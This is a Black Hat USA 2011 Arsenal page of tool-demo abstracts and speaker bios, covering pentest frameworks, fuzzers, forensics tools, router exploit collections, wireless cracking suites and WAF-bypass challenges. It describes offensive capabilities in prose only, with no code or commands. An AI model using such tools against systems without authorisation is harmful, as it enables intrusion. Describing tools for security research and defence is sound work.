Black Hat USA 2011

Black Hat USA 2011 //Black Hat Arsenal: Call for Tools

Caesars Palace Las Vegas, NV • July 30 - August 4

wed: Aug. 3 | thurs: Aug. 4

Black Hat, is pleased to offer a Tool/Demo area for independent researchers and the open source community that will allow you to showcase your work. The concept is simple: We will be providing kiosks complete with monitor, power, wired internet access and you will bring your machine to showcase your work and answer questions from delegates attending Black Hat. Spaces will be limited to showcase unique tools/demos over the course of the Briefings.

Brad 'Nurse' Smith previews Black Hat Arsenal


white paper document




Day One Day Two

Presentation Speakers/Abstracts

Chema Alonso

DUST: your RSS feed belongs to you

Law around the world is trying to control what is published on the Internet. After wikeleaks case and HBGary ownage everybody could see how there are many controls that can be used to close a website, a domain name and to cut the communication between the source and the audience. What happened if someone wants to close your blog? Could you send any message to your audience? In this talk we provide you a new way to publish your RSS feeds using P2P networks as a failover system. Dust is "only" a Reader but could manage P2P Feeds, multiples http feeds from the same source, and the most important feature, can migrate from one feed to multiple ones without any effort for all your readers.

Francisco Amato


Faraday (named like that on tribute to the six principles of Michael Faraday's scientific discipline) is an Open Source Penetration test IDE. It's pretty similar to a programming IDE (like Komodo, Eclipse, NetBeans) with the difference that Faraday is for Multiuser Penetration testing purposes. At first sight seems like another IDE, but it's much more than that. It consists of a Client and a Server, both containing databases. Designed for distributing, indexation and analysis of the generated knowledge during the engagement of a penetration test.

Francisco Amato is a researcher and computer security consultant who works in the area of vulnerability Development, blackbox testing, reverse engineering. He runs his own company - [ISR] Infobyte Security Research, from where he published his developments in audit tools and vulnerabilities in products from companies like Novell, IBM, Sun Microsystems, Apple, Microsoft. His last work was evilgrade a modular framework that allows the user to take advantage of an upgrade process from different applications, compromising the system by injecting custom payloads. Founding organizer of ekoparty south america security conference



Weaponized Nokia N900 with full suite of wireless and network penetration testing tools. Mobile pentesting image freely available. This demo will go over the capabilities of the PwnPhone particularly highly wireless tools and techniques.

Awk is a wireless / network hacker from Pwnie Express who loves mobile devices with Linux.

Ryan Barnett

ModSecurity Demonstration Pages / ModSecurity Smoketest page - / ModSecurity Javascript Sandbox

ModSecurity Smoketest Page

The ModSecurity Demo is a joint effort between the ModSecurity and PHPIDS project teams to allow users to test ModSecurity and PHPIDS. Any data is sent to a ModSecurity install for inspection by the CRS and then it will be proxied to the PHPIDS page for normal inspection and processing. The response body will then be inspected to confirm if there are any evasion issues between the CRS and PHPIDS.

Demo Challenge

Your challenge is to try and bypass the attack detection mechanisms of ModSecurity and the OWASP Core Rule Set (CRS).

ModSecurity Javascript Sandbox

The purpose of this demo is to show possible XSS defenses by using ModSecrity's Content Injection capability to insert defensive Javascript to the beginning of html responses. This demo uses Eduardo (sirdarckcat) Vela's Active Content Signatures (ACS) code.

Read more about this concept

Demo Challenge

Your challenge is to try and bypass the ACS content injection and successfully execute a reflected XSS attack that executes JS code in your browser. You may toggle On/Off the XSS Content Injection Defense by checking the box in the form below. This will help to facilitate testing of working XSS payloads.

Ryan C. Barnett is a senior security researcher on Trustwave's SpiderLabs Team. He is a SANS Institute certified instructor and a member of both the Top 20 Vulnerabilities and CWE/SANS Top 25 Most Dangerous Programming Errors teams. In addition to working with SANS, he is also a WASC Member where he leads the Web Hacking Incidents Database (WHID) and Distributed Open Proxy Honeypots Projects and is also the OWASP ModSecurity Core Rule Set (CRS) project leader. Mr. Barnett has also authored a Web security book for Addison/Wesley Publishing entitled Preventing Web Attacks with Apache

Armin Buescher


ReplayProxy is a tool to replay HTTP traffic that is captured in a pcap file and features an extensible API to modify the replayed content. It can be used as a forensic tool to investigate Web-based attacks or to develop ways of reducing Web-based attacks.

Armin Buescher began studying Computer Science in Germany in 2002. After finishing his diploma thesis on the analysis of Web-based attacks, his work focused on the strategic development of techniques to prevent exploits and on tools that analyze these exploits, especially client honeypot systems. He joined Websense(r) Security Labs(tm) in early 2011 as a security researcher.

Marcus Carey

Metasploit vSploit Modules

In this demonstration for security practitioners who are responsible for enterprise network security solutions, Marcus Carey shows how to use the Metasploit Framework beyond penetration testing to validate whether security solutions are working as expected. Marcus has researched network intrusion attributes for years, and has successfully been able to emulate those attributes with Metasploit framework. The new Metasploit modules designed specifically for testing firewalls, IDS, IPS, and DLP solutions.

Marcus J. Carey is the Enterprise Security Community Manager at Rapid7. Marcus has over 17 years experience in information assurance experience working in the DoD as well as Federal and State Government organizations. Marcus holds a M.S. in Network Security From Capitol College as well as several security related certifications.

Andrew Case

Registry Decoder

The registry on all Microsoft Windows operating systems contains a wealth of forensically interesting information, including a history of attached devices, a list of user accounts, URLs typed into local web browsers, information about network shares and much more. Unfortunately, existing tools for process sing the Windows registry are difficult to use and leave the investigator with many complex, manual tasks. Not only does this lead to human error and waste a substantial amount of time during investigations, it also leads to missed evidence due to investigator inexperience. For investigators who are not constantly trained or self-taught, the ever changing format of the registry, meaning of keys, and value of information contained is simply lost.

To combat these issues, we developed Registry Decoder, a point and click tool that collects and analyzes the Windows registry files from forensic targets and prepares a readable report for the investigator. This tool contains two applications, the first is used for traditional "dead" forensics against hard drive images and the second is used for "live" (triage) analysis of running machines. Registry Decoder is easily customizable and provides an interface for investigators to quickly identify what information is most crucial for their cases, extract that data and render it into a report format. Additional information is provided to give the investigator practical insight into the meaning and relevance of the data collected. Registry Decoder can also be used to examine values in the current Windows registry alongside copies of the registry stored by the system restore point facility to cross-reference this information and help reconstruct a historical background of the system under investigation. Registry Decoder also creates visualizations of a number of types of relevant information in order to help investigators to quickly understand the data, as well as for presentation of evidence to non-technical peers.

Andrew Case is a researcher at Digital Forensics Solutions where he is responsible for source code audits, penetration testing, reverse engineering, and other computer security related tasks. He is also a GIAC-certified digital forensics investigator and has conducted numerous large scale investigations. Andrew is the co-developer of Registry Decoder a National Institute of Justice funded forensics application, as well as a developer on the Volatility memory analysis project. Andrew's primary research focus is physical memory analysis, and he has published a number of peer-reviewed papers in the field. He has presented this work at conferences including Blackhat, SOURCE, and DFRWS.

Stephan Chenette

Fireshark v2

I will present a web security research project called FireShark that is capable of visiting large collections of websites at a time, executing, storing and analyzing the content, and from it identifying hundreds of malicious ecosystems of which the data, such as the normalized, deobfuscated content within them can easily be analyzed.

Stephan Chenette is a principal security researcher at Websense Security Labs, specializing in research tools and next generation emerging threats. In this role, he identifies and implements exploit and malcode detection techniques. Stephan has released public analyses on various vulnerabilities and malware. Prior to joining Websense, Stephan was a security software engineer working in research and product development at eEye Digital Security.

Thomas Cross + Christopher Byrd + Takehiro Takahashi

Secure Open Wireless Demo

We'll be demoing our GPLv2 proof of concept code for Secure Open Wireless, which we're releasing at Blackhat. Today, 802.11 wireless networks are either unencrypted or they require authentication. We're demonstrating a third way which uses an anonymous form of EAP-TLS to create an encrypted wireless connection without a pre-shared password. Users are protected from rogue access points with an SSL certificate tied to the SSID of the access point. In our approach, certified SSIDs would have to be globally unique identifiers. Domain names could be used for this purpose. An SSH style trust on first use fall back mechanism can protect connections to networks that are too small to protect with a commercial certificate authority.

Tom Cross manages Threat Intelligence and Strategy for IBM's X-Force Research organization.

Christopher Byrd helps businesses and organizations understand and respond to risks associated with technology. He is currently a Manager in Brown Smith Wallace's Risk Advisory Services group and Security and Privacy services leader.

Takehiro Takahashi is an individual security researcher, and formerly a vulnerability researcher at IBM X-Force.

Isaac Dawson

The Web Browser Testing System (WBTS)

The Web Browser Testing System WBTS was built to quickly automate and test various browser and user-agents for security issues. It contains all the necessary services required for testing a browser. The following services are included: DNS, HTTP(S), Logging Services and support for VirtualHosts.

Isaac Dawson has been in the security consulting industry for nine years prior to contracting at Veracode as a security researcher. He has conducted hundreds of application penetration tests while working at @stake and subsequently Symantec Consulting. Shortly after @stake was purchased he released a paper on exploiting Blind Buffer Overflows in ISAPI extensions which was featured on SecurityFocus. Late in 2005 he relocated to Japan and helped build the Symantec Japan security consulting team. Since relocating, he has done extensive application testing work for a large cellular operator. One such assessment was of a mobile browser implementation, from then on he has enjoyed learning and attempting to break various browsers.

Timur Duehr


Ragweed is our native code debugging library written in Ruby. It runs on Win32, OSX and Linux. Thats right, we implemented a native code debugger from the ground up using nothing but Ruby and FFI. You read that right, no 3rd party dependencies! Ragweed can be used to build powerful tools such as scriptable debuggers and hit tracers. You can rewrite GDB with it or an in memory fuzzer in just a few lines of code! There are many convenience methods for retrieving information from a target process such as heap and stack mappings, loaded libraries and much more.

Timur Duehr is a Security Consultant at Matasano Security with over six years computer consulting experience. His professional experience includes application development, security assessment, and code review.

Gregory Fleischer, Nathan Hamiel

RAFT - Response Analysis and Further Testing

RAFT is an open source Python tool designed to assist with web application assessments.

Many current web testing tools are struggling to keep up with modern web applications that have moved to highly dynamic page generation and web service communication channels. RAFT attempts to bridge this gap by providing response analysis capabilities for existing tool's log and stored session information. RAFT supports directly importing from Burp files as well as Paros and WebScarab proxy logs. Additionally, RAFT defines its own XML capture format that can be used to store traffic from custom tools; a urllib2 compatible processor module is provided.

RAFT is also proof-of-concept utility to help discover and crawl dynamic content, perform smart fuzzing, improve visibility into modern web applications, and serve as a testbed for exploring emerging HTML5 features. By embedding QT's WebKit web browser, RAFT can interact directly with the rendered content using the browser DOM and injected JavaScript callbacks. This provides interesting capabilities such as fuzzing for DOM based XSS injections in previously stored responses using a totally offline approach. A future version of the tool is expected to contain an integrated scanner component and reusable analysis engine.

RAFT is released under a GPLv3 license.

Gregory Fleischer is a Senior Security Consultant in the Application Security practice at FishNet Security. In his spare time, he likes to find and exploit vulnerabilities in web browsers and client-side technologies such as Java and Flash. He has an interest in privacy and anonymity and has worked with The Tor Project to identify potential issues.

Nathan Hamiel is a Principal Consultant for FishNet Security's Application Security Practice. He is also an Associate Professor of Software Engineering at the University of Advancing Technology. He spends most of his time focusing in the areas of application, Web 2.0, and enterprise security. Nathan has been a speaker at security events around the world including: Black Hat, DefCon, ShmooCon, ToorCon, SecTor, and many others.

Travis Goodspeed

GoodFET for Wireless Keyboard Sniffing

The Microsoft 2.4GHz Wireless Keyboards use a five-byte XOR key and a Nordic RF nRF24L01+ radio. Sniffing is made difficult because the key is also used as a Start of Frame Delimiter unique to each keyboard/dongle pair. By some Layer 1 trickery, it is possible to sniff keyboard packets without knowing the SFD. This demonstration features an unmodified keyboard being sniffed by a badge from the Next Hope conference, running the GoodFET firmware.

Travis Goodspeed is a neighborly reverse engineer of embedded systems from Southern Appalachia. He maintains the GoodFET project, which acts as a USB adapter for JTAG debugging and a variety of radio chips. Among other types of radios, the GoodFET can receive and broadcast APCO P25, ZigBee, ANT+, and a few dozen other protocols. He is also the designer of the Next Hope conference badge.

Alejandro Hernández

DotDotPwn - The Directory Traversal Fuzzer

It's a very flexible intelligent fuzzer to discover directory traversal vulnerabilities in software such as Web/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc. Also, it has a protocol-independent module to send the desired payload to the host and port specified. On the other hand, it also could be used in a scripting way using the STDOUT module. It's written in perl programming language and can be run either under *NIX or Windows platforms.

Fuzzing modules supported:

  • HTTP
  • FTP
  • TFTP
  • Payload (Protocol independent)

Today, DotDotPwn has found more than 10 security flaws in some HTTP, FTP and TFTP servers.

Alejandro Hernández is a mexican IT Security Advisor that is mostly involved in projects regarding to Penetration Testing, IT governance, Risk analysis, Tiger Teaming, ISMS design, Gap analysis, security controls assessments, IT security strategy design, audit of IT controls over financial reporting, among other tasks.

With some years of Vulnerability Development experience, he has found design and security bugs in products of companies such as Cisco and TrendMicro, as well as in software like Ubuntu Linux, Snort and Acunetix WVS. One of his latest achievements was capturing the flag in the CTF (Capture The Flag) held in SANS Toronto 10'.

Nowadays, he spends part of his time doing research in topics regarding critical infrastructure and intelligent fuzzing. Also, he is fascinated with Computer Sciences, Evolutionary Computation (specifically Genetic Algorithms), Tactical Exploitation and Counterintelligence things.

Pedro Joaquin


Routerpwn is a mobile exploitation framework that helps you in the exploitation of vulnerabilities in network devices such as residential and commercial routers, switches and access points.

It is a compilation of ready to run local and remote web exploits. Programmed in Javascript and HTML in order to run in all "smart phones" and mobile Internet devices, including Android, iPhone, BlackBerry and all tablets. You can even store it off line for local exploitation without Internet connection.

Pedro "hkm" Joaquin was born in Cozumel island in the Caribbean. Pedro used to be a forensic investigator, malware analyst and antimalware software vendor for the top banks in Mexico. Curently he founded his own company that focuses on vulnerability research and pentesting. 10 years ago Pedro created a community called "Mexican Underground Community" ( which focuses on hacking and phreaking, It is the largest hacking community in Mexico. With this community he has organized a vast number of public and private meetings all over Mexico, including some 2600 ones. Over the past years Pedro has been researching residential routers and has found several critical bugs in many of them. He has been a speaker at many conferences including DEFCON.

Byoungyoung Lee

DarunGrim: A Patch Analysis and Binary Diffing Tool

DarunGrim is a free binary diffing tool. Binary diffing is a powerful technique to reverse-engineer patches released by software vendors like Microsoft. Especially by analyzing security patches you can dig into the details of the vulnerabilities it's fixing. You can use that information to learn what causes software break. Also that information can help you write some protection codes for those specific vulnerabilities. It's also used to write 1-day exploits by malware writers or security researchers. Please check more information on

Byoungyoung Lee is currently M.S. student at POSTECH. He is a sub-developer of DarunGrim and he has interests in both practical and academic software security research. In the past, he actively participated wargames and advanced to the DEFCON CTF final round two times. He also published fuzzers and exploits targeting Microsoft products. His academic research interests are in binary obfuscation and location privacy, which were published in ACM SIGKDD and ACM ASIACCS. From Fall 2011, he will join a CS Ph.D. program at Georgia Tech.

Gordon Fyodor Lyon

Mastering the New Nmap

Many Black Hat attendees keep the free Nmap Security Scanner ( in their toolbox, but few truly harness its full power. While Nmap is simple to use for basic scanning, it also offers hundreds of powerful options for optimizing performance, detecting and defeating firewalls and intrusion detection systems, and even performing application-level audits. Nmap also evolves so quickly that keeping up with the new capabilities is a challenge. This session is an opportunity to enhance your skills by asking Nmap's author Fyodor anything about Nmap or its companion tools Ncat, Zenmap, Ndiff, and Nping. Fyodor will also demonstrate powerful new capabilities of Nmap, with a particular emphasis on the Nmap Scripting Engine and IPv6 support.

Fyodor (known to his family as Gordon Lyon) authored the open source Nmap Security Scanner in 1997 and continues to coordinate its development. He also maintains the Insecure.Org, Nmap.Org, SecLists.Org, and SecTools.Org security resource sites and has authored seminal papers on remote operating system detection and stealth port scanning. He is a founding member of the Honeynet project, former president of Computer Professionals for Social Responsibility (CPSR), and author or co-author of the books "Nmap Network Scanning", "Know Your Enemy: Honeynets" and "Stealing the Network: How to Own a Continent". Videos of his 2010 and 2008 Black Hat and Defcon presentations can be viewed at

Christian Martorella

Wfuzz & WebSlayer 2.0

Wfuzz is a tool designed for brute forcing Web Applications, it can be used to discover resources (directories, scripts, files), brute force GET and POST parameters, brute force forms parameters (User/Password), Fuzzing, Basic and NTLM brute forcing. The tool is very flexible and is the one stop solution for Web Applications brute forcing.

This new version includes a re designed payload management, payload combinations and randomization, improved output, no limit in injection points(you can use as many as you want), SOCKs support, multiple proxies (the requests will be send through a different proxy each time) and time delay between requests, plus all the previous features like multiple encodings.

Webslayer is the GUI front-end with advanced features like an advanced Payload generation engine and flexible result analysis.

Christian Martorella has been working in the field of information security for the last 10 years, starting his career in Argentina IRS as security consultant, now he's Practice Leader in Threat and Vulnerability Consulting- EMEA in Verizon Business. He is cofounder an active member of Edge-Security team, where security tools and research is released. He has been speaker at What The Hack!, NoConName, FIST Conferences, OWASP Summit and OWASP Spain IV & VI, Source Conference Barcelona and Hack.LU. Christian has contributed with open source assessment tools like OWASP WebSlayer and Metagoofil. He likes all related to Information Gathering and Penetration testing.

Christian Martorella

TheHarvester and Metagoofil 2.0

theHarvester and Metagoofil are tools developed to aid Penetration Testers in the Information Gathering task. The tools can gather emails accounts, subdomains, virtual hosts and Metadata from public available documents (usernames,server names, software versions,etc), employee names using different data sources like search engines, pgp key servers and Linkedin.

These new versions were developed from scratch focusing on extensibility and new features. This version of Metagoofil allows to search in a local filesystems, added new libraries to parse documents more efficiently increasing the results, a new option to extract emails and subdomains from the documents content (PDF´s) and proxy support. theHarvester came with new data sources like google-profiles, exalead search engine, bing_api and google_api), this version includes virtual host discovery and recursive discovery. Both tools can save the results in XML for importing in other tools.

Christian Martorella has been working in the field of information security for the last 10 years, starting his career in Argentina IRS as security consultant, now he's Practice Leader in Threat and Vulnerability Consulting- EMEA in Verizon Business. He is cofounder an active member of Edge-Security team, where security tools and research is released. He has been speaker at What The Hack!, NoConName, FIST Conferences, OWASP Summit and OWASP Spain IV & VI, Source Conference Barcelona and Hack.LU. Christian has contributed with open source assessment tools like OWASP WebSlayer and Metagoofil. He likes all related to Information Gathering and Penetration testing.

Willem Mouton


Yeti is a Sensepost tool for internet footprinting, fingerprinting and dns mininig. It's sql database backend and scripting interface makes it a really powerful, yet easy to use tool. So if there is a target out there, the Yeti will find it.

Willem hails from a development background and is responsible for developing most of SensePost's internal tools. With his mind-set being very much that of a builder, his skills at penetration testing ensure he gains root on many assessments, due to him knowing where weaknesses are often introduced during the development phase.

Raphael Mudge

Armitage for Metasploit: Squad Level Cyber Operations

Featured on the cover of the May 2011 Linux Journal and used by Cameron to hack Oz's system on Fox's Breaking In, Armitage is a graphical cyber attack management tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced capabilities of the framework. This demonstration will show how to manage remote Metasploit instances and collaborate using Armitage. You'll learn how to share sessions and data, communicate, and carry out advanced post-exploitation as a team through one Metasploit instance

Raphael Mudge is a Washington, DC, based code hacker working on a new startup effort. His current open source work is the Armitage GUI for Metasploit. His past projects include the After the Deadline proofreading software service and the Sleep scripting language. Raphael has worked as a security researcher, software engineer, penetration tester, and system administrator. Raphael also holds a commission in the Air National Guard.

Matthew Olney

Razorback Framework

Developed by Sourcefire's Vulnerability Research Team, the Razorback Framework is a near-real time defense system. Much like Metasploit (but for the defense side), it is designed to give security teams a platform for the rapid development and deployment of detection strategies. The current version of this open source tool displays enterprise scalability, agile defense development, linked data retention and verbose alerting.

Matthew Olney works on Sourcefire's Vulnerability Research Team as a Principal Research Engineer and the Architect for the Razorback project. In addition to providing expertise in the Snort engine, detection concepts and rule writing, Matt assists the Sourcefire training group in advanced security course development. He has spoken on Snort internals, rule development and advanced detection issues. Matt brings to the VRT a strong operations background, having worked in network and security engineering roles with such organizations as Verisign, Network Solutions, Nortel and the Department of Defense.

Mike Ridpath


A proof of concept tool showcasing how one can break SSL sessions on Google Maps. It enables one to build profiles of scraped Google Maps sattelite tiles and is then able, based on this profile data, to break SSL sessions to Google Maps and reconstruct the locations a user is looking at.

Mike Ridpath is a Security Consultant with IOActive, where he works directly with enterprise clients to deliver time-sensitive, mission-critical engagements that assess the security of networks and applications including both physical and social engineering penetration tests. In addition to finishing his Masters degree in Information Security, Ridpath also has discovered numerous previously-unknown software security vulnerabilities while on engagements and presented his findings to C-level client stakeholders. Ridpath recently co-delivered the presentation "Social Engineering and the Cold Call" at Toorcon Seattle 2011 and played on the winning Capture the Flag team at Defcon 2010.
Prior to working at IOActive, Ridpath was in senior management as a product developer and on governing boards for multiple training and process improvement companies, where he worked with risk analysis and various process improvement methodologies.

David Rook


Working with developers, security professionals and management to cultivate an environment where secure code is written and flaws found consistently requires both time and money. The same can be said for producing informative reports and metrics when all of your security code review data resides in notepad, Word and Excel files. With these problems in mind I developed Agnitio to be my security code review Swiss army knife and released it as a open source tool in late 2010.

In this demonstration filled presentation I will show how Agnitio can be used to addresses repeatability, integrity and audit trail concerns by requiring the creation of application profiles, the use of a security code review checklist consisting of over 60 application security questions and mandatory integrity checks for reviews and reports created using the tool. I will demonstrate how the inbuilt secure coding and security code review guidance modules allow developers and security professionals to access the information they need precisely when they need it. I will also show how Agnitio automatically creates metrics and reports bringing much needed visibility to the security code review process with no extra effort required from the reviewer, developers or management.

Agnitio v2.0 will be released during this presentation which will see Agnitio's already powerful feature set expanded to include more secure coding and security code review guidance, additional report types, developer and reviewer focused metrics and an automated source code analysis module.

David works as a Security Analyst for Realex Payments in Dublin. He is a contributor to several OWASP projects including the code review guide and the Cryptographic Storage Cheat Sheet. He has presented at leading information security conferences including DEF CON, SecurityBSides Las Vegas and RSA Europe. In addition to his work with OWASP David created a security resource website and blog called Security Ninja (

In 2010 the Security Ninja blog was nominated for five awards including the best technology blog at the Irish Blog Awards, the Computer Weekly IT Security blog award and was a finalist for the Irish Web Awards Best Technology Site. The website has an international audience with visitors from over 140 countries. David has recently become one of the first mentors in the Information Security Mentors project helping young people progress their information security careers.

Chris Schmidt

Enterprise Security API

ESAPI (The OWASP Enterprise Security API) is a free, open source, web application security control library that makes it easier for programmers to write lower-risk applications. The ESAPI libraries are designed to make it easier for programmers to retrofit security into existing applications. The ESAPI libraries also serve as a solid foundation for new development.

Chris Schmidt is an Application Security Engineer and Senior Software Engineer at Aspect Security. He is heavily involved in the Open Web Application Security Project (OWASP) as a leader, contributer, and frequent speaker at local and global application security conferences. He has worked in IT for more than 15 years as a Hardware Engineer, Software Engineer, and Systems Architect. He is one of the Project Managers for the OWASP Enterprise Security API and serves on the OWASP Global Projects Committee.

Maximiliano Soler

FireCAT: Weaponizing your Browser

Basing us on the grateful browser Firefox and its personalization capabilities, we have created FireCAT: Firefox Catalog of Auditing exTensions.

FireCAT allows us to turn the browser to a powerful auditing weapon using only the appropriate extensions and great imagination.

Step to step will be explained, how is possible to have through Firefox a wide and varied utilities available list, to put in action!

Trivia: The idea behind FireCAT came during a pentest. When I had challenged to performed it without any tool. So, Firefox along with extensions being with a great help.

What is FireCAT?

FireCAT (Firefox Catalog of Auditing exTension) is a mindmap collection of the most efficient and useful Firefox extensions oriented application security auditing and assessment. FireCAT is not a replacement of other security utilities and software as well as fuzzers, proxies and application vulnerabilities scanners.


  • Current Version: 1.6.2
  • Addons: > 80
  • Categories: 7
  • Subcategories: 18

Environments where it would be applied:

  • Web Application Security.
  • Phishing detection.
  • Code auditing.
  • Vulnerability mapping.


  • Included complements.
  • Scope of the Project.
  • Newness and future of FireCAT.
  • A NEW Version will be released on BH.


Information Gathering.

  • Whois.
  • Local info.
  • Enumeration & Fingerprint.
  • Data Mining.
  • Googling & Spidering.
  • All in one.

Proxying / Web Utilities.

Security Auditing.

Network Tools.

  • Intrusion Detection System.
  • Sniffers.
  • Wi-Fi.
  • Passwords.
  • Protocols / Applications.


IT Security Related.


  • Hacks for fun.
  • Encription / Hashing.
  • Malware Scanner.
  • Anti Spoof.
  • Anti phishing / Pharming / Jacking.
  • Automation.
  • Logs / History

Actually working as Security Consultant, in a International Bank. I have discovered vulnerabilities in different applications Web and products of Microsoft.

I'm part of the team that day by day, contributes with newness, responsible from FireCAT.

Mario Suvajac

Impact of unpublished features of PE Format and their validation with TitanEngine and TitanMist

ReversingLabs will present its latest research on unpublished PE format features at Black Hat Las Vegas 2011. Come to Arsenal booth to see these findings live, discuss their impact, and learn how to detect and validate them. In addition, we will be demonstrating how our open source and freeware tools (TitanEngine – BH LV 2009, NyxEngine – BH Barcelona 2010, TitanMist – BH LV 2010) can help you manipulate published and unpublished PE features and detect and decompose complex payloads that may be hiding within.

Mario Suvajac is Senior Reverse Engineer at ReversingLabs, He has several years of experience with reversing archive and PE formats. Currently he works on next generation decomposition technologies.

Paul Watson


Capirca is an open-sourced cross-platform network security policy compiler developed at Google. It allows the creation and deployment of ACL filters across multiple target platforms based on a single security policy and shared network and service definitions. The software is ideal for both small and large organizations to eliminate common errors while greatly simplifying security policy maintenance.

Paul (Tony) Watson currently lives in Denver, CO. He spends his time flying FPV R/C planes and helicopters, writing code, breaking things, and working as a senior security engineer at Google.

Chuck Willis

OWASP Broken Web Applications Project

The Open Web Application Security Project (OWASP) Broken Web Applications project ( provides a free and open source virtual machine loaded with web applications containing security vulnerabilities. This session will showcase the project and exhibit how it can be used for training, testing, and experimentation by people in a variety of roles.

Demonstrations will cover how the project can be used by penetration testers who discover and exploit web application vulnerabilities, by developers and others who prevent and defend against web application attacks, and by individuals who respond to web application incidents.

Chuck Willis is a Technical Director with MANDIANT, a full spectrum information security company in Alexandria, Virginia. At MANDIANT, Mr. Willis concentrates in several areas including application security, where he assesses the security of sensitive software applications through external testing and static analysis. He also studies static analysis tools and techniques and strives to identify better ways to evaluate and secure software. Mr. Willis is the leader of the OWASP Broken Web Applications project, which distributes a virtual machine with known vulnerable web applications for testing and training.

Mark Wuergler


SILICA is Immunity's automated wireless attack utility designed to assess the security of wireless networks. Some of the features include:

  • Recover WEP and WPA1/2 keys
  • Crack LEAP Authentication
  • Reveal hidden SSIDs
  • Discover associated wireless clients
  • Automatically scan networks for vulnerabilities
  • Decrypt WPA traffic of all associated clients
  • Hijack web application sessions

SILICA's goal is to aid in wireless penetration testing. Everything from recon to active exploitation is availabe to the user in a visual and dynamic format. Using SILICA it is possible to reduce false positives common in most vulnerability scanners by actively exploiting discovered hosts using the latest CANVAS client-side and remote exploits complete with a variety of post-exploitation actions such as grabbing password hashes, all wireless profiles/keys on the compromised host and a screen shot of the active desktop. All of this at the click of a button!

Mark Wuergler is an active SILICA developer and security consultant for Immunity, Inc in Miami Beach Florida. For many years Mark has helped develop and teach advanced security courses and perform security assessments for Fortune 500 companies as well as government, financial and educational sectors all over the world. Before joining Immunity he was working as a lead security specialist for a security firm in Moscow Russia with a focus on application and wifi assessments.